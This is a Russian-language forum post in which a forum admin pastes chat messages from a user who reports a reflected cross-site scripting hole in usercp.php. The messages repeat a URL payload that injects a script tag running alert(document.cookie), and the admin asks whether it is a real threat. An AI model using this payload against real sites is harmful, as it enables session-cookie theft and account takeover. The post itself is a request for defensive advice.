На одном сайте, где я время от времени админю (форум на 3,8,2 version) один из юзеров написал вот такое
[26-03, 14:14] Ale
http://site.com/usercp.php?s=[Session ID]"><Script>alert(cookie)%3B</Script>
[26-03, 14:14] Ale
http://site.com/usercp.php?s=[Session ID]"><Script>alert(document.cookie)%3B</Script>
[26-03, 14:14] Ale
http://site.com/usercp.php?s=[Session ID]"><Script>alert(document.cookie)%3B</Script>
[26-03, 14:14] Ale
http://site.com/usercp.php?s=[Session%20ID]%22%3E%3CScript%3Ealert(document.cookie)%3B%3C/Script%3E
[26-03, 14:13] Ale
http://site.com/usercp.php?s=[Session%20ID]%22%3E%3CScript%3Ealert(document.cookie)%3B%3C/Script%3E
[26-03, 14:13] Ale Пропачтте форум АДМИНЫ
PHP код:
http://site.com/usercp.php?s=[Session ID]"><Script>alert(document.cookie)%3B</Script>
[26-03, 14:11] Ale http://site.com/usercp.php...e)%3B</Script>
[26-03, 14:09] Ale
Код HTML:
http://site.com/usercp.php?s=[Session ID]"><span style="color:#800000"><Script></span>alert(document.cookie)%3B<span style="color:#800000"></Script></span>
[26-03, 14:08] Ale что за админы
[26-03, 14:08] Ale validate.php не удалено
[26-03, 14:07] Ale usercp.php?s=[Session ID]"><Script>alert(document.cookie)%3B</Script>
[26-03, 14:07] Ale :(
Я не сторонник всяких быстрих апдейтов - речь про софт и скрипты, если конечно речь не про секюрити.
Поэтому прошу помочь меня с советом, стоит ли мне так беспокоиться или .... юзер просто хотел выделиться ?
Что касается
"validate.php не удалено" в руте форума нема validate.php, есть только validator.php (после предупреждения я переименовал этот файл).
По поводу остального (
alert(document.cookie)) я как понял речь про injections, но быстрый поиск ничего путного не дал в инете.
Стоит ли беспокоиться ?